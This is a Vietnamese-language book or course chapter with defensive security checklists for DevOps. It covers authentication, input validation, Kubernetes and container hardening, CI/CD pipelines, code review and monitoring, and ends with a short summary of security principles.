Chương 35: Checklist bảo mật cho DevOps

Checklist Deployment

Authentication & Authorization:
□ Passwords hashed với bcrypt/argon2 (minimum 12 rounds)
□ MFA enabled cho admin accounts
□ Session tokens: cryptographically random, >= 128 bits
□ Cookie attributes: HttpOnly, Secure, SameSite=Strict/Lax
□ JWT: specify algorithm, verify signature, check exp
□ Access control: deny by default, check server-side

Input Validation:
□ All user inputs validated server-side
□ Parameterized queries (SQL)
□ XML parser: disable external entities
□ File upload: validate content, not extension/Content-Type
□ Filename sanitized before filesystem use

Output Security:
□ HTML output: context-aware encoding
□ JSON responses: correct Content-Type
□ Security headers: CSP, X-Frame-Options, HSTS, X-Content-Type-Options

API Security:
□ Rate limiting: per-endpoint, per-user
□ Authentication required cho sensitive endpoints
□ Mass assignment protection: whitelist fields
□ CORS: whitelist specific origins only

Infrastructure:
□ HTTPS enforced (TLS 1.2+)
□ Security headers via server/ingress config
□ WAF configured và tested
□ Secrets: không hardcode, dùng secrets manager
□ Least privilege: service accounts, IAM roles, DB users

Checklist Container/K8s

Container:
□ Non-root user (runAsNonRoot: true)
□ Read-only filesystem (readOnlyRootFilesystem: true)
□ Drop capabilities (capabilities.drop: [ALL])
□ Resource limits defined
□ No secrets in image layers
□ Image scanned (Trivy)
□ Signed images (cosign)

Kubernetes:
□ RBAC: least privilege
□ Network Policy: default deny
□ Pod Security Standards: Restricted profile
□ Secrets: External Secrets Operator hoặc Vault
□ ServiceAccount: automountServiceAccountToken: false
□ Ingress: whitelist source IPs cho admin endpoints
□ No NodePort exposing internal services

Namespace:
□ Separate namespaces: prod/staging/dev
□ ResourceQuota và LimitRange defined
□ Admission controllers: OPA/Kyverno policies

Checklist CI/CD

Pipeline:
□ Secrets trong CI/CD secret store (không trong code)
□ Pinned dependency versions (không @latest)
□ SAST trong PR checks
□ Dependency scanning (Snyk/Dependabot)
□ Container image scanning
□ DAST sau deploy to staging
□ No shell injection trong pipeline steps

Code Review:
□ Security review checklist cho PRs
□ SQL queries: parameterized?
□ User input: validated và sanitized?
□ Secrets: accidentally committed?
□ Dependencies: any new ones với known CVEs?

Checklist Monitoring

Logging:
□ Auth events logged (success/failure)
□ Access control denials logged
□ Sensitive data NOT logged (passwords, tokens, PII)
□ Centralized logging (ELK/Loki)
□ Log retention policy defined

Alerting:
□ Brute force detection
□ Anomalous data access
□ Failed auth spike
□ New admin user created
□ Critical resource deleted
□ Cert expiry warning (30/14/7 days)

Monitoring:
□ WAF alerts reviewed
□ CVE alerts cho dependencies
□ Cloud security alerts (GuardDuty/Security Hub)
□ Penetration testing: annual minimum
□ Vulnerability scanning: monthly

---

Tóm tắt

• Security không phải one-time task — là continuous process.
• Shift left: tích hợp security từ development, không đợi production.
• Automation: SAST/DAST trong CI/CD, automated vulnerability scanning.
• Defense in depth: không phụ thuộc vào 1 lớp bảo mật.
• Incident response: có plan, test plan, improve từ incidents.
• Monitoring: không có logging = không có visibility khi bị tấn công.